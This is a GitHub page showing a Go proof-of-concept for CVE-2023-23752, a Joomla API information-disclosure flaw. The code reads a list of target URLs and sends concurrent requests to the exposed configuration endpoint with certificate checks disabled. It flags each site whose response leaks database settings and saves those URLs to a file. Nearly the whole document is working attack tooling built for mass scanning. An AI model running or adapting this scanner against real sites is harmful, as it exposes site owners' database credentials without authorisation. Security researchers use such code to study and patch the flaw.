-
Notifications
You must be signed in to change notification settings - Fork 0
/
cve-2023-23752-PoC.go
125 lines (121 loc) · 3.17 KB
/
cve-2023-23752-PoC.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
package main
import (
"bufio"
"bytes"
"crypto/tls"
"flag"
"fmt"
"io"
"net/http"
"os"
"runtime/debug"
"strings"
"sync"
"time"
)
func main() {
start := time.Now()
var WG sync.WaitGroup
var mutex sync.Mutex
s := flag.String("l", "AllUrl", "Store the text of the url")
flag.Parse()
suspicious, err := os.OpenFile("./out.txt", os.O_CREATE|os.O_RDWR|os.O_APPEND, 0777)
if err != nil {
fmt.Println("[-]---File creation error", err)
return
}
defer suspicious.Close()
suspiciousWriter := bufio.NewWriter(suspicious)
limitChan := make(chan struct{}, 70)
urls, readErr := readLine(*s)
if readErr != nil {
return
}
if len(urls) == 0 {
fmt.Println("[-]---NOT URL")
return
}
for _, url := range urls {
limitChan <- struct{}{}
WG.Add(1)
go func(url string) {
defer func() {
if e := recover(); e != nil {
fmt.Printf("WriteDataToTxt panic: %v,stack: %s\n", e, debug.Stack())
return
}
defer WG.Done()
<-limitChan
}()
tr := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
MaxIdleConnsPerHost: 150,
}
client := &http.Client{
Timeout: time.Second * 30,
Transport: tr,
}
req, err1 := http.NewRequest("GET", url+"/api/index.php/v1/config/application?public=true", nil)
if err1 != nil {
fmt.Println("[-]---Request err:", err1)
return
}
req.Header.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362")
req.Header.Add("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9")
resp, err2 := client.Do(req)
if err2 != nil {
fmt.Println("[-]---Client do err:", err2)
return
}
defer resp.Body.Close()
wr := bytes.NewBuffer(nil)
defer wr.Reset()
w := bufio.NewWriter(wr)
_, err3 := io.Copy(w, resp.Body)
if err3 != nil {
fmt.Println("[-]---Read content error", err3)
return
}
if strings.Contains(string(wr.Bytes()), "dbtype") {
fmt.Println("[+]---There is loophole.:", url+"/api/index.php/v1/config/application?public=true")
mutex.Lock()
_, err = suspiciousWriter.WriteString(url + "/api/index.php/v1/config/application?public=true" + "\n")
if err != nil {
fmt.Println("[-]---storage error:", err)
return
}
mutex.Unlock()
} else {
fmt.Println("[-]---There is no vulnerability:", url+"/api/index.php/v1/config/application?public=true")
}
}(url)
}
WG.Wait()
fmt.Println("[+]---Save the result...")
writeErr1 := suspiciousWriter.Flush()
if writeErr1 != nil {
fmt.Println("[-]---storage error", writeErr1)
return
}
elapsed := time.Since(start)
fmt.Println("[+]---elapsed time:", elapsed)
fmt.Println("by https://github.com/GhostToKnow/CVE-2023-23752")
}
func readLine(location string) ([]string, error) {
file, err := os.Open(location)
if err != nil {
fmt.Println("[-]---File reading error", err)
return nil, err
}
defer file.Close()
re := bufio.NewReader(file)
var data []string
for {
a, _, c := re.ReadLine()
if c == io.EOF {
break
}
data = append(data, string(a))
}
return data, nil
}